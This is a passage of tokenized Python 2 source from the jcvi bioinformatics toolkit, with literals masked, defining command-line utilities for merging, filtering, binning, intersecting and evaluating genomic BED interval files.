append ( min_i ) <EOL> return newids <EOL> def longest ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( longest . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> maxsize = opts . maxsize <EOL> minsize = opts . minsize <EOL> prec = opts . precedence <EOL> mergedbed = mergeBed ( bedfile , nms = True ) <EOL> sizes = Sizes ( fastafile ) . mapping <EOL> bed = Bed ( mergedbed ) <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> ids = set ( ) <EOL> for b in bed : <EOL> accns = b . accn . split ( "<STR_LIT:;>" ) <EOL> prec_accns = [ x for x in accns if x . startswith ( prec ) ] <EOL> if prec_accns : <EOL> accns = prec_accns <EOL> accn_sizes = [ ( sizes . get ( x , <NUM_LIT:0> ) , x ) for x in accns ] <EOL> accn_sizes = [ ( size , x ) for size , x in accn_sizes if size < maxsize ] <EOL> if not accn_sizes : <EOL> continue <EOL> max_size , max_accn = max ( accn_sizes ) <EOL> if max_size < minsize : <EOL> continue <EOL> ids . add ( max_accn ) <EOL> newids = remove_isoforms ( ids ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( ids ) , len ( newids ) ) ) <EOL> longestidsfile = pf + "<STR_LIT>" <EOL> fw = open ( longestidsfile , "<STR_LIT:w>" ) <EOL> print >> fw , "<STR_LIT:\n>" . join ( newids ) <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( newids ) , longestidsfile ) ) <EOL> longestbedfile = pf + "<STR_LIT>" <EOL> some ( [ bedfile , longestidsfile , "<STR_LIT>" . 
format ( longestbedfile ) , <EOL> "<STR_LIT>" ] ) <EOL> def merge ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( merge . __doc__ ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfiles = args <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> for bedfile in bedfiles : <EOL> bed = Bed ( bedfile ) <EOL> pf = op . basename ( bedfile ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> for b in bed : <EOL> b . seqid = "<STR_LIT:_>" . join ( ( pf , b . seqid ) ) <EOL> print >> fw , b <EOL> def fix ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( fix . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> minspan = opts . minspan <EOL> fp = open ( bedfile ) <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> nfixed = nfiltered = ntotal = <NUM_LIT:0> <EOL> for row in fp : <EOL> atoms = row . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> assert len ( atoms ) >= <NUM_LIT:3> , "<STR_LIT>" <EOL> seqid , start , end = atoms [ : <NUM_LIT:3> ] <EOL> start , end = int ( start ) , int ( end ) <EOL> orientation = '<STR_LIT:+>' <EOL> if start > end : <EOL> start , end = end , start <EOL> orientation = '<STR_LIT:->' <EOL> nfixed += <NUM_LIT:1> <EOL> atoms [ <NUM_LIT:1> : <NUM_LIT:3> ] = [ str ( start ) , str ( end ) ] <EOL> if len ( atoms ) > <NUM_LIT:6> : <EOL> atoms [ <NUM_LIT:6> ] = orientation <EOL> line = "<STR_LIT:\t>" . join ( atoms ) <EOL> b = BedLine ( line ) <EOL> if b . span >= minspan : <EOL> print >> fw , b <EOL> nfiltered += <NUM_LIT:1> <EOL> ntotal += <NUM_LIT:1> <EOL> if nfixed : <EOL> logging . debug ( "<STR_LIT>" . 
format ( percentage ( nfixed , ntotal ) ) ) <EOL> if nfiltered : <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( nfiltered , ntotal ) ) ) <EOL> def some ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . base import SetFile <EOL> from jcvi . utils . cbook import gene_name <EOL> p = OptionParser ( some . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> p . set_stripnames ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , idsfile = args <EOL> inverse = opts . inverse <EOL> ostrip = opts . strip_names <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> ids = SetFile ( idsfile ) <EOL> if ostrip : <EOL> ids = set ( gene_name ( x ) for x in ids ) <EOL> bed = Bed ( bedfile ) <EOL> ntotal = nkeep = <NUM_LIT:0> <EOL> for b in bed : <EOL> ntotal += <NUM_LIT:1> <EOL> keep = b . accn in ids <EOL> if inverse : <EOL> keep = not keep <EOL> if keep : <EOL> nkeep += <NUM_LIT:1> <EOL> print >> fw , b <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( nkeep , ntotal ) ) ) <EOL> def uniq ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( uniq . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> uniqbedfile = bedfile . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> bed = Bed ( bedfile ) <EOL> if opts . sizes : <EOL> sizes = Sizes ( opts . sizes ) . mapping <EOL> ranges = [ Range ( x . seqid , x . start , x . end , sizes [ x . 
accn ] , i ) for i , x in enumerate ( bed ) ] <EOL> else : <EOL> if opts . mode == "<STR_LIT>" : <EOL> ranges = [ Range ( x . seqid , x . start , x . end , x . end - x . start + <NUM_LIT:1> , i ) for i , x in enumerate ( bed ) ] <EOL> else : <EOL> ranges = [ Range ( x . seqid , x . start , x . end , float ( x . score ) , i ) for i , x in enumerate ( bed ) ] <EOL> selected , score = range_chain ( ranges ) <EOL> selected = [ x . id for x in selected ] <EOL> selected_ids = set ( selected ) <EOL> selected = [ bed [ x ] for x in selected ] <EOL> notselected = [ x for i , x in enumerate ( bed ) if i not in selected_ids ] <EOL> newbed = Bed ( ) <EOL> newbed . extend ( selected ) <EOL> newbed . print_to_file ( uniqbedfile , sorted = True ) <EOL> if notselected : <EOL> leftoverfile = bedfile . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> leftoverbed = Bed ( ) <EOL> leftoverbed . extend ( notselected ) <EOL> leftoverbed . print_to_file ( leftoverfile , sorted = True ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( bed ) , len ( newbed ) ) ) <EOL> return uniqbedfile <EOL> def subtractbins ( binfile1 , binfile2 ) : <EOL> from jcvi . graphics . landscape import BinFile <EOL> abin = BinFile ( binfile1 ) <EOL> bbin = BinFile ( binfile2 ) <EOL> assert len ( abin ) == len ( bbin ) <EOL> fw = open ( binfile1 , "<STR_LIT:w>" ) <EOL> for a , b in zip ( abin , bbin ) : <EOL> assert a . chr == b . chr <EOL> assert a . binlen == b . binlen <EOL> a . subtract ( b ) <EOL> print >> fw , a <EOL> fw . close ( ) <EOL> return binfile1 <EOL> def bins ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( bins . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> p . 
add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT:count>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> subtract = opts . subtract <EOL> mode = opts . mode <EOL> assert op . exists ( bedfile ) , "<STR_LIT>" . format ( bedfile ) <EOL> binsize = opts . binsize <EOL> binfile = bedfile + "<STR_LIT>" . format ( binsize ) <EOL> binfile += "<STR_LIT>" . format ( mode ) <EOL> if not need_update ( bedfile , binfile ) : <EOL> return binfile <EOL> sz = Sizes ( fastafile ) <EOL> sizesfile = sz . filename <EOL> sizes = sz . mapping <EOL> fw = open ( binfile , "<STR_LIT:w>" ) <EOL> scores = "<STR_LIT>" if mode == "<STR_LIT>" else None <EOL> bedfile = mergeBed ( bedfile , nms = True , scores = scores ) <EOL> if subtract : <EOL> subtractmerge = mergeBed ( subtract ) <EOL> subtract_complement = complementBed ( subtractmerge , sizesfile ) <EOL> bedfile = intersectBed ( bedfile , subtract_complement ) <EOL> bedfile = sort ( [ bedfile , "<STR_LIT>" ] ) <EOL> bed = Bed ( bedfile ) <EOL> sbdict = dict ( bed . sub_beds ( ) ) <EOL> for chr , chr_len in sorted ( sizes . items ( ) ) : <EOL> chr_len = sizes [ chr ] <EOL> subbeds = sbdict . get ( chr , [ ] ) <EOL> nbins = chr_len / binsize <EOL> last_bin = chr_len % binsize <EOL> if last_bin : <EOL> nbins += <NUM_LIT:1> <EOL> a = np . zeros ( nbins ) <EOL> b = np . zeros ( nbins , dtype = "<STR_LIT:int>" ) <EOL> c = np . zeros ( nbins , dtype = "<STR_LIT:int>" ) <EOL> b [ : - <NUM_LIT:1> ] = binsize <EOL> b [ - <NUM_LIT:1> ] = last_bin <EOL> for bb in subbeds : <EOL> start , end = bb . start , bb . end <EOL> startbin = start / binsize <EOL> endbin = end / binsize <EOL> assert startbin <= endbin <EOL> c [ startbin : endbin + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> if mode == "<STR_LIT>" : <EOL> a [ startbin : endbin + <NUM_LIT:1> ] += float ( bb . 
score ) <EOL> elif mode == "<STR_LIT>" : <EOL> if startbin == endbin : <EOL> a [ startbin ] += end - start + <NUM_LIT:1> <EOL> if startbin < endbin : <EOL> firstsize = ( startbin + <NUM_LIT:1> ) * binsize - start + <NUM_LIT:1> <EOL> lastsize = end - endbin * binsize <EOL> a [ startbin ] += firstsize <EOL> if startbin + <NUM_LIT:1> < endbin : <EOL> a [ startbin + <NUM_LIT:1> : endbin ] += binsize <EOL> a [ endbin ] += lastsize <EOL> if mode == "<STR_LIT:count>" : <EOL> a = c <EOL> for xa , xb in zip ( a , b ) : <EOL> print >> fw , "<STR_LIT:\t>" . join ( str ( x ) for x in ( chr , xa , xb ) ) <EOL> fw . close ( ) <EOL> if subtract : <EOL> subtractbinfile = bins ( [ subtract , fastafile , "<STR_LIT>" . format ( binsize ) ] ) <EOL> binfile = subtractbins ( binfile , subtractbinfile ) <EOL> return binfile <EOL> def pile ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . utils . grouper import Grouper <EOL> p = OptionParser ( pile . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> abedfile , bbedfile = args <EOL> iw = intersectBed_wao ( abedfile , bbedfile , minOverlap = opts . minOverlap ) <EOL> groups = Grouper ( ) <EOL> for a , b in iw : <EOL> groups . join ( a . accn , b . accn ) <EOL> ngroups = <NUM_LIT:0> <EOL> for group in groups : <EOL> if len ( group ) > <NUM_LIT:1> : <EOL> ngroups += <NUM_LIT:1> <EOL> print "<STR_LIT:|>" . join ( group ) <EOL> logging . debug ( "<STR_LIT>" . format ( ngroups ) ) <EOL> def index ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( index . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . 
print_help ( ) ) <EOL> bedfile , = args <EOL> fastafile = opts . fasta <EOL> if fastafile : <EOL> bedfile = make_bedgraph ( bedfile , fastafile ) <EOL> bedfile = sort ( [ bedfile ] ) <EOL> gzfile = bedfile + "<STR_LIT>" <EOL> if need_update ( bedfile , gzfile ) : <EOL> cmd = "<STR_LIT>" . format ( bedfile ) <EOL> sh ( cmd ) <EOL> tbifile = gzfile + "<STR_LIT>" <EOL> if need_update ( gzfile , tbifile ) : <EOL> cmd = "<STR_LIT>" . format ( gzfile ) <EOL> sh ( cmd ) <EOL> query = opts . query <EOL> if not query : <EOL> return <EOL> cmd = "<STR_LIT>" . format ( gzfile , query ) <EOL> sh ( cmd , outfile = opts . outfile ) <EOL> def fastaFromBed ( bedfile , fastafile , name = False , tab = False , stranded = False ) : <EOL> suffix = "<STR_LIT>" if tab else "<STR_LIT>" <EOL> outfile = op . basename ( bedfile ) . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + suffix <EOL> cmd = "<STR_LIT>" . format ( fastafile , bedfile , outfile ) <EOL> if name : <EOL> cmd += "<STR_LIT>" <EOL> if tab : <EOL> cmd += "<STR_LIT>" <EOL> if stranded : <EOL> cmd += "<STR_LIT>" <EOL> if need_update ( [ bedfile , fastafile ] , outfile ) : <EOL> sh ( cmd , outfile = outfile ) <EOL> return outfile <EOL> def mergeBed ( bedfile , d = <NUM_LIT:0> , sorted = False , nms = False , s = False , scores = None , delim = "<STR_LIT:;>" ) : <EOL> if not sorted : <EOL> bedfile = sort ( [ bedfile , "<STR_LIT>" ] ) <EOL> cmd = "<STR_LIT>" . format ( bedfile ) <EOL> if d : <EOL> cmd += "<STR_LIT>" . format ( d ) <EOL> if nms : <EOL> nargs = len ( open ( bedfile ) . readline ( ) . split ( ) ) <EOL> if nargs <= <NUM_LIT:3> : <EOL> logging . debug ( "<STR_LIT>" . format ( nargs ) ) <EOL> else : <EOL> cmd += "<STR_LIT>" <EOL> if s : <EOL> cmd += "<STR_LIT>" <EOL> if scores : <EOL> valid_opts = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not scores in valid_opts : <EOL> scores = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . 
format ( scores ) <EOL> if delim : <EOL> cmd += '<STR_LIT>' . format ( delim ) <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] if bedfile . endswith ( "<STR_LIT>" ) else bedfile <EOL> mergebedfile = op . basename ( pf ) + "<STR_LIT>" <EOL> if need_update ( bedfile , mergebedfile ) : <EOL> sh ( cmd , outfile = mergebedfile ) <EOL> return mergebedfile <EOL> def complementBed ( bedfile , sizesfile ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( bedfile , sizesfile ) <EOL> complementbedfile = "<STR_LIT>" + op . basename ( bedfile ) <EOL> if need_update ( [ bedfile , sizesfile ] , complementbedfile ) : <EOL> sh ( cmd , outfile = complementbedfile ) <EOL> return complementbedfile <EOL> def intersectBed ( bedfile1 , bedfile2 ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( bedfile1 , bedfile2 ) <EOL> suffix = "<STR_LIT>" <EOL> intersectbedfile = "<STR_LIT:.>" . join ( ( op . basename ( bedfile1 ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] , <EOL> op . basename ( bedfile2 ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] ) ) + suffix <EOL> if need_update ( [ bedfile1 , bedfile2 ] , intersectbedfile ) : <EOL> sh ( cmd , outfile = intersectbedfile ) <EOL> return intersectbedfile <EOL> def query_to_range ( query , sizes ) : <EOL> if "<STR_LIT::>" in query : <EOL> a , bc = query . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> b , c = [ int ( x ) for x in bc . split ( "<STR_LIT:->" , <NUM_LIT:1> ) ] <EOL> b -= <NUM_LIT:1> <EOL> else : <EOL> a = query <EOL> b , c = <NUM_LIT:0> , sizes . mapping [ a ] <EOL> return a , b , c <EOL> def evaluate ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( evaluate . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:3> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> prediction , reality , fastafile = args <EOL> query = opts . 
query <EOL> prediction = mergeBed ( prediction ) <EOL> reality = mergeBed ( reality ) <EOL> sizes = Sizes ( fastafile ) <EOL> sizesfile = sizes . filename <EOL> prediction_complement = complementBed ( prediction , sizesfile ) <EOL> reality_complement = complementBed ( reality , sizesfile ) <EOL> TPbed = intersectBed ( prediction , reality ) <EOL> FPbed = intersectBed ( prediction , reality_complement ) <EOL> FNbed = intersectBed ( prediction_complement , reality ) <EOL> TNbed = intersectBed ( prediction_complement , reality_complement ) <EOL> beds = ( TPbed , FPbed , FNbed , TNbed ) <EOL> if query : <EOL> subbeds = [ ] <EOL> rr = query_to_range ( query , sizes ) <EOL> ce = '<STR_LIT>' . format ( "<STR_LIT:\t>" . join ( str ( x ) for x in rr ) ) <EOL> for b in beds : <EOL> subbed = "<STR_LIT:.>" . join ( ( b , query ) ) <EOL> cmd = ce + "<STR_LIT>" . format ( b ) <EOL> sh ( cmd , outfile = subbed ) <EOL> subbeds . append ( subbed ) <EOL> beds = subbeds <EOL> be = BedEvaluate ( * beds ) <EOL> print >> sys . stderr , be <EOL> if query : <EOL> for b in subbeds : <EOL> os . remove ( b ) <EOL> return be <EOL> def intersectBed_wao ( abedfile , bbedfile , minOverlap = <NUM_LIT:0> ) : <EOL> abed = Bed ( abedfile ) <EOL> bbed = Bed ( bbedfile ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( abedfile , len ( abed ) ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( bbedfile , len ( bbed ) ) <EOL> cmd = "<STR_LIT>" . format ( abedfile , bbedfile ) <EOL> acols = abed [ <NUM_LIT:0> ] . nargs <EOL> bcols = bbed [ <NUM_LIT:0> ] . nargs <EOL> fp = popen ( cmd ) <EOL> for row in fp : <EOL> atoms = row . split ( ) <EOL> aline = "<STR_LIT:\t>" . join ( atoms [ : acols ] ) <EOL> bline = "<STR_LIT:\t>" . 
join ( atoms [ acols : acols + bcols ] ) <EOL> c = int ( atoms [ - <NUM_LIT:1> ] ) <EOL> if c < minOverlap : <EOL> continue <EOL> a = BedLine ( aline ) <EOL> try : <EOL> b = BedLine ( bline ) <EOL> except AssertionError : <EOL> b = None <EOL> yield a , b <EOL> def refine ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( refine . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:3> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> abedfile , bbedfile , refinedbed = args <EOL> fw = open ( refinedbed , "<STR_LIT:w>" ) <EOL> intersected = refined = <NUM_LIT:0> <EOL> for a , b in intersectBed_wao ( abedfile , bbedfile ) : <EOL> if b is None : <EOL> print >> fw , a <EOL> continue <EOL> intersected += <NUM_LIT:1> <EOL> aspan_before = a . span <EOL> arange = ( a . start , a . end ) <EOL> brange = ( b . start , b . end ) <EOL> irange = range_intersect ( arange , brange ) <EOL> a . start , a . end = irange <EOL> aspan_after = a . span <EOL> if aspan_before > aspan_after : <EOL> refined += <NUM_LIT:1> <EOL> print >> fw , a <EOL> fw . close ( ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( intersected ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( refined ) <EOL> summary ( [ abedfile ] ) <EOL> summary ( [ refinedbed ] ) <EOL> def distance ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . utils . iter import pairwise <EOL> p = OptionParser ( distance . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> sortedbedfile = sort ( [ bedfile ] ) <EOL> valid = total = <NUM_LIT:0> <EOL> fp = open ( sortedbedfile ) <EOL> for a , b in pairwise ( fp ) : <EOL> a = BedLine ( a ) <EOL> b = BedLine ( b ) <EOL> ar = ( a . seqid , a . start , a . 
end , "<STR_LIT:+>" ) <EOL> br = ( b . seqid , b . start , b . end , "<STR_LIT:+>" ) <EOL> dist , oo = range_distance ( ar , br , distmode = opts . distmode ) <EOL> total += <NUM_LIT:1> <EOL> if dist > <NUM_LIT:0> : <EOL> print dist <EOL> valid += <NUM_LIT:1> <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( valid , total ) ) ) <EOL> def sample ( args ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> from jcvi . assembly . coverage import Coverage <EOL> p = OptionParser ( sample . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:10> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , sizesfile = args <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> raindrop = opts . raindrop <EOL> if raindrop : <EOL> bed = Bed ( bedfile ) <EOL> forward = [ ] <EOL> for b in bed : <EOL> if not forward or abs ( b . start - forward [ - <NUM_LIT:1> ] . start ) >= raindrop : <EOL> forward . append ( b ) <EOL> reverse = [ ] <EOL> bed . sort ( key = lambda x : - x . end ) <EOL> for b in bed : <EOL> if not reverse or abs ( b . end - reverse [ - <NUM_LIT:1> ] . end ) >= raindrop : <EOL> reverse . append ( b ) <EOL> for tag , L in zip ( ( "<STR_LIT>" , "<STR_LIT>" ) , ( forward , reverse ) ) : <EOL> logging . debug ( "<STR_LIT>" . format ( len ( L ) , tag , sum ( x . span for x in L ) ) ) <EOL> selected = Bed ( ) <EOL> selected . extend ( set ( forward + reverse ) ) <EOL> selected . print_to_file ( opts . outfile , sorted = True ) <EOL> return <EOL> targetsize = opts . 
targetsize <EOL> if targetsize : <EOL> bed = Bed ( bedfile ) <EOL> samplebed = pf + "<STR_LIT>" <EOL> fw = open ( samplebed , "<STR_LIT:w>" ) <EOL> nfeats = len ( bed ) <EOL> nbases = bed . sum ( unique = False ) <EOL> targetfeats = int ( round ( nfeats * targetsize / nbases ) ) <EOL> sub_bed = random . sample ( bed , targetfeats ) <EOL> for b in sub_bed : <EOL> print >> fw , b <EOL> logging . debug ( "<STR_LIT>" . format ( samplebed ) ) <EOL> return <EOL> c = Coverage ( bedfile , sizesfile ) <EOL> coveragefile = c . filename <EOL> samplecoveragefile = pf + "<STR_LIT>" <EOL> fw = open ( samplecoveragefile , "<STR_LIT:w>" ) <EOL> fp = open ( coveragefile ) <EOL> for row in fp : <EOL> seqid , start , end , cov = row . split ( ) <EOL> cov = int ( cov ) <EOL> if cov <= opts . max : <EOL> fw . write ( row ) <EOL> fw . close ( ) <EOL> samplebedfile = pf + "<STR_LIT>" <EOL> cmd = "<STR_LIT>" . format ( bedfile , samplecoveragefile ) <EOL> sh ( cmd , outfile = samplebedfile ) <EOL> logging . debug ( "<STR_LIT>" . format ( samplebedfile ) ) <EOL> def bedpe ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . assembly . coverage import bed_to_bedpe <EOL> p = OptionParser ( bedpe . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> bedpefile = pf + "<STR_LIT>" <EOL> bedspanfile = pf + "<STR_LIT>" if opts . span else None <EOL> bed_to_bedpe ( bedfile , bedpefile , pairsbedfile = bedspanfile , matesfile = opts . mates ) <EOL> return bedpefile , bedspanfile <EOL> def sizes ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( sizes . __doc__ ) <EOL> opts , args = p . 
parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> assert op . exists ( bedfile ) <EOL> sizesfile = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> fw = must_open ( sizesfile , "<STR_LIT:w>" , checkexists = True , skipcheck = True ) <EOL> if fw : <EOL> b = Bed ( bedfile ) <EOL> for s , sbeds in b . sub_beds ( ) : <EOL> print >> fw , "<STR_LIT>" . format ( s , max ( x . end for x in sbeds ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( sizesfile ) ) <EOL> return sizesfile <EOL> def analyze_dists ( dists , cutoff = <NUM_LIT:1000> , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> peak0 = [ d for d in dists if d < cutoff ] <EOL> peak1 = [ d for d in dists if d >= cutoff ] <EOL> c0 , c1 = len ( peak0 ) , len ( peak1 ) <EOL> logging . debug ( "<STR_LIT>" . format ( c0 , c1 ) ) <EOL> if c0 == <NUM_LIT:0> or c1 == <NUM_LIT:0> or float ( c1 ) / len ( dists ) < alpha : <EOL> logging . debug ( "<STR_LIT>" . format ( c1 , len ( dists ) , alpha ) ) <EOL> return np . median ( dists ) <EOL> peak0_median = np . median ( peak0 ) <EOL> peak1_median = np . median ( peak1 ) <EOL> logging . debug ( "<STR_LIT>" . format ( int ( peak0_median ) , c0 , int ( peak1_median ) , c1 ) ) <EOL> return peak1_median <EOL> def report_pairs ( data , cutoff = <NUM_LIT:0> , mateorientation = None , <EOL> pairsfile = None , insertsfile = None , rclip = <NUM_LIT:1> , ascii = False , bins = <NUM_LIT:20> , <EOL> distmode = "<STR_LIT>" , mpcutoff = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> allowed_mateorientations = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if mateorientation : <EOL> assert mateorientation in allowed_mateorientations <EOL> num_fragments , num_pairs = <NUM_LIT:0> , <NUM_LIT:0> <EOL> all_dist = [ ] <EOL> linked_dist = [ ] <EOL> orientations = defaultdict ( int ) <EOL> key = ( lambda x : x . accn [ : - rclip ] ) if rclip else ( lambda x : x . 
accn ) <EOL> data . sort ( key = key ) <EOL> if pairsfile : <EOL> pairsfw = open ( pairsfile , "<STR_LIT:w>" ) <EOL> if insertsfile : <EOL> insertsfw = open ( insertsfile , "<STR_LIT:w>" ) <EOL> for pe , lines in groupby ( data , key = key ) : <EOL> lines = list ( lines ) <EOL> if len ( lines ) != <NUM_LIT:2> : <EOL> num_fragments += len ( lines ) <EOL> continue <EOL> num_pairs += <NUM_LIT:1> <EOL> a , b = lines <EOL> asubject , astart , astop = a . seqid , a . start , a . end <EOL> bsubject , bstart , bstop = b . seqid , b . start , b . end <EOL> aquery , bquery = a . accn , b . accn <EOL> astrand , bstrand = a . strand , b . strand <EOL> dist , orientation = range_distance ( ( asubject , astart , astop , astrand ) , <EOL> ( bsubject , bstart , bstop , bstrand ) , <EOL> distmode = distmode ) <EOL> if dist >= <NUM_LIT:0> : <EOL> all_dist . append ( ( dist , orientation , aquery , bquery ) ) <EOL> if mateorientation : <EOL> all_dist = [ 